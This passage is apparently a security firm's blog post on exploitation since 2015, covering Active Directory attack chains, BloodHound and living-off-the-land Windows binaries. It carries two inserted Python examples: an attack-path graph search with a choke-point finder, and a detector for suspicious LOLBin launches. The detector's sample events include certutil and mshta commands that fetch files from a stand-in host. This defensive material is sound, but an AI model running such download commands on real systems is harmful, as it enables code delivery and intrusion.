Blog Series: Exploitations, Penetration Testing, and Modern Cybersecurity Defenses
Evolution of Exploitation, Part 3: 2015+
By Luke Willadsen
BLUF: This blog series is written to provide an anecdotal history of the evolution of exploitation in cybersecurity, focused largely on network exploitations in an enterprise and couched as Luke’s perspective over his decade-long career in InfoSec.
In the field of cybersecurity, there’s one constant: it’s a game of cat-and-mouse. As exploits and vulnerabilities evolve, so too do vendors and defenders. While the first half of the 2010s is remembered for the prevalence of buffer overflow attacks and the rise of PowerShell-based remote execution techniques, the remainder of the decade featured new and “improved” ways to perform network exploitation.
Active Directory (AD) exploitation and privilege abuse wasn’t in any way a new concept, but until the mid-2010s it wasn’t a priority technique. This is likely because of two things: a.) offensive security specialists were overthinking it, and b.) less complicated techniques worked just fine. Active Directory exploitation can be quite complicated and involve many steps in the attack path to obtain Admin’s privileges, but the exploits used remain relatively rudimentary. Here’s an example:
Say our goal is to get on Admin’s system, but we only have employee Steve’s credentials. We would try to use Steve’s credentials to get on a system that Admin is logged into and steal Admin’s creds from there. This is a two-step attack. To find out this information we would query the AD domain controller and ask it questions about its users, groups, computers, permissions, and more. Note: there was rarely a two-step attack path to getting Admin’s privileges. Instead, the attack often ballooned into a five- or ten-step chain. Phish onto Mary’s system, use Mary’s credentials to log into a system that allows all domain users administrative access, and from that system grab Dave’s credentials. Use Dave’s credentials to log into Joe’s system. Use Joe’s credentials to dump a database containing Steve’s password hash. Crack Steve’s password hash. Use the password to log into Admin’s computer and steal Admin’s credentials.
So you might have some questions – like why is Dave able to log into Joe’s system? Why is Steve able to log into Admin’s system? The answer is, there is no good answer. They shouldn’t be able to. But they ARE able to. How or why does this happen? Well, when you’re an IT administrator tasked with managing 10,000 users and computers, the administrative burden is so great that little mistakes slip through the cracks. We call these misconfigurations. Maybe Joe’s computer used to be Dave’s, and when it was reassigned to Joe, the administrators forgot to remove Dave’s permissions on it.
These mistakes are inevitable, and exploiting them became even easier with the release of a tool called BloodHound. BloodHound allows the user to automatically map these misconfigurations and view complex attack paths that are strictly based on poorly configured Active Directory privileges and unintended relationships in AD. BloodHound leverages graph theory to help us visualize these attack paths, enabling attackers to conceptualize and map long chains of attack paths that wouldn’t really be possible through manual enumeration of AD. Just because a relationship appears in an attack path doesn’t mean it can actually be exploited. Techniques such as a man-in-the-middle attack (to gain some encrypted credentials), hijacking and redirecting a valid authentication request (to get a session on a system), network scanning (to look for resources we can access without authenticating), and others may still need to be leveraged in order to go from no credentials or low-privilege credentials to Admin.
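The graph idea behind BloodHound is simple enough to show in a few dozen lines. The following is an added example (not part of the original post and not BloodHound’s own code): a constructed, hypothetical set of BloodHound-style edges (MemberOf, AdminTo, HasSession) modelling the Mary-to-Admin chain described above, a breadth-first search that finds the shortest path from a starting principal to Domain Admins, and a defender’s helper that reports which single AdminTo right, if removed, would cut every path. All node names (mary, KIOSK01, JOE-PC, and so on) are invented for the example.

```python
from collections import deque

# Constructed sample data (not a real domain): the chain the post describes,
# Mary -> Dave -> Joe -> Steve -> Admin, expressed as BloodHound-style edges.
# "HasSession" stands in for any way a credential ends up recoverable on a
# host, including the "dump and crack a hash" step described in the post.
EDGES = [
    ("mary", "MemberOf", "Domain Users"),
    ("dave", "MemberOf", "Domain Users"),
    ("joe", "MemberOf", "Domain Users"),
    ("steve", "MemberOf", "Domain Users"),
    ("admin", "MemberOf", "Domain Admins"),
    ("Domain Users", "AdminTo", "KIOSK01"),   # every domain user is a local admin here
    ("KIOSK01", "HasSession", "dave"),
    ("KIOSK01", "HasSession", "joe"),         # Joe also logs into the kiosk
    ("dave", "AdminTo", "JOE-PC"),            # leftover right from a reassignment
    ("JOE-PC", "HasSession", "joe"),
    ("joe", "AdminTo", "DBSRV01"),
    ("DBSRV01", "HasSession", "steve"),
    ("steve", "AdminTo", "ADMIN-PC"),
    ("ADMIN-PC", "HasSession", "admin"),
]


def build_graph(edges):
    """Adjacency list: node -> [(relationship, target), ...]."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
        graph.setdefault(dst, [])
    return graph


def shortest_path(edges, start, goal):
    """Breadth-first search; returns the hops as (src, rel, dst) tuples, or None."""
    graph = build_graph(edges)
    if start not in graph:
        return None
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for rel, nxt in graph[node]:
            if nxt not in parent:
                parent[nxt] = (node, rel)
                queue.append(nxt)
    if goal not in parent:
        return None
    path = []
    node = goal
    while parent[node] is not None:   # walk back from the goal to the start
        prev, rel = parent[node]
        path.append((prev, rel, node))
        node = prev
    return list(reversed(path))


def choke_points(edges, start, goal, fixable=("AdminTo",)):
    """Fixable edges (rights an admin can revoke) whose removal alone
    disconnects start from goal. Session edges are transient, so by default
    only AdminTo rights are considered candidates for a fix."""
    result = []
    for edge in edges:
        if edge[1] not in fixable:
            continue
        remaining = [e for e in edges if e != edge]
        if shortest_path(remaining, start, goal) is None:
            result.append(edge)
    return result


if __name__ == "__main__":
    for hop in shortest_path(EDGES, "mary", "Domain Admins"):
        print("%s -[%s]-> %s" % hop)
    print("single rights whose removal cuts every path:")
    for edge in choke_points(EDGES, "mary", "Domain Admins"):
        print("  revoke", edge)
```

Two things the output shows that the paragraph alone does not: the shortest route skips Dave entirely (Joe’s session on the kiosk is a shorter hop), and revoking Dave’s leftover right on JOE-PC therefore fixes nothing on its own, while the "all domain users are local admins" right on KIOSK01 is a genuine choke point. Real BloodHound runs the same kind of query over far more edge types in a Neo4j graph.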
At this point in our game of cat-and-mouse, some defenders have been quite keen to respond to and protect themselves from these more basic attacks. As such, hackers have changed tactics again in the last few years. Rather than having a specific go-to for getting a RAT running on a victim machine, many hackers have become more agnostic in how they pursue and achieve code execution. Lately that has involved analyzing the endpoint security product, and any other defensive countermeasures, and then relying on a native Windows binary to execute our tools.
A project called Living Off the Land Binaries and Scripts (LOLBAS) documents the usage and functionality of 119 Windows binaries that we can leverage to gain code execution. These binaries, if not properly monitored, allow us to bypass application whitelisting, UAC, AMSI, and more, depending on the nature and use of the binary. Once we have code execution, many of us are either performing reflective DLL injection or leveraging C# and .NET to get our RATs to execute .NET assemblies within the context of our running process. Rather than put down a new executable, DLL, or script for each capability we want to run on victim machines (such as Mimikatz), we can just load it straight into memory and run it. Many of these ready-to-go assemblies can be easily found on GitHub.
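"If not properly monitored" is the defender’s hook in that paragraph, so here is an added example (not part of the original post, and not code from the LOLBAS project) of what monitoring looks like: a small detection pass over constructed, Sysmon-style process-creation events that flags a known living-off-the-land binary when it is spawned by an Office application or is handed a remote URL or UNC path on its command line. The binary names are a short hand-picked subset of the LOLBAS catalogue, not the full list of 119; the parent list, the sample events, and the `example.invalid` hostname are all constructed for the example.

```python
import ntpath

# Hand-picked subset of binaries documented by LOLBAS (the project lists many
# more); chosen for the example, not an official or complete list.
LOLBINS = {
    "certutil.exe", "regsvr32.exe", "mshta.exe", "rundll32.exe",
    "msbuild.exe", "installutil.exe", "bitsadmin.exe",
    "wmic.exe", "cscript.exe", "wscript.exe",
}

# Parents that should almost never launch a LOLBin in normal use (constructed list).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# A URL or UNC path on the command line means the binary is reaching off-host.
REMOTE_MARKERS = ("http://", "https://", "\\\\")

# Constructed sample events using Sysmon Event ID 1 field names.
EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"certutil.exe https://example.invalid/x.txt C:\Users\Public\x.txt"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Windows\notepad.exe SHA256"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"regsvr32.exe /s C:\Users\bob\AppData\Local\Temp\x.dll"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe https://example.invalid/a.hta"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\bob\notes.txt"},
]


def basename(path):
    """Case-insensitive file name from a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def evaluate(event):
    """Return the list of reasons an event is suspicious; empty means benign."""
    image = basename(event.get("Image", ""))
    if image not in LOLBINS:
        return []
    reasons = []
    parent = basename(event.get("ParentImage", ""))
    if parent in SUSPICIOUS_PARENTS:
        reasons.append("%s spawned by %s" % (image, parent))
    cmd = event.get("CommandLine", "").lower()
    if any(marker in cmd for marker in REMOTE_MARKERS):
        reasons.append("%s given a remote location on its command line" % image)
    return reasons


def scan(events):
    """Return (event index, reasons) for every event that trips a rule."""
    hits = []
    for idx, event in enumerate(events):
        reasons = evaluate(event)
        if reasons:
            hits.append((idx, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in scan(EVENTS):
        print("event %d: %s" % (idx, "; ".join(reasons)))
```

The second certutil event is the point of the parent and command-line checks: certutil run from a shell to hash a file is ordinary administration, and alerting on every launch of a LOLBin would bury the three events that matter. Production rules add more context (signed-ness of the loaded module, user, host role) and more binaries, but the shape is the same.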
Stay on standby for the conclusion for this exploitation series, coming soon.
About the Author: Luke Willadsen, Technical Services Lead, EmberSec, is an InfoSec professional and white hat hacker. After getting his start with the Dept. of Defense in 2010, Luke leveraged his specialization in offensive security and eventually turned to private and public sector consulting. Mr. Willadsen has a bachelor’s degree in cybersecurity, a master’s degree in technology studies, an OSCP certification, and a CISSP certification. Outside of his professional life, Luke is a husband, an animal lover, a fitness enthusiast and a passable guitar player, plays a bard in Dungeons and Dragons, and enjoys playing a few rounds of Battlefield on his PS4 a night or two a week.
About EmberSec: EmberSec, a Division of By Light, serves as a provider of advanced, technical cybersecurity services and solutions. Whether that's testing the maturity and efficiency of your security program through technical assessments, integrating highly customized Managed Detection & Response capabilities, or aligning your infrastructure and security practices around industry frameworks, EmberSec understands the complexities involved in establishing a truly secure enterprise.
The EmberSec team is comprised of senior security researchers, operators, and intelligence professionals, and specializes in the following domains: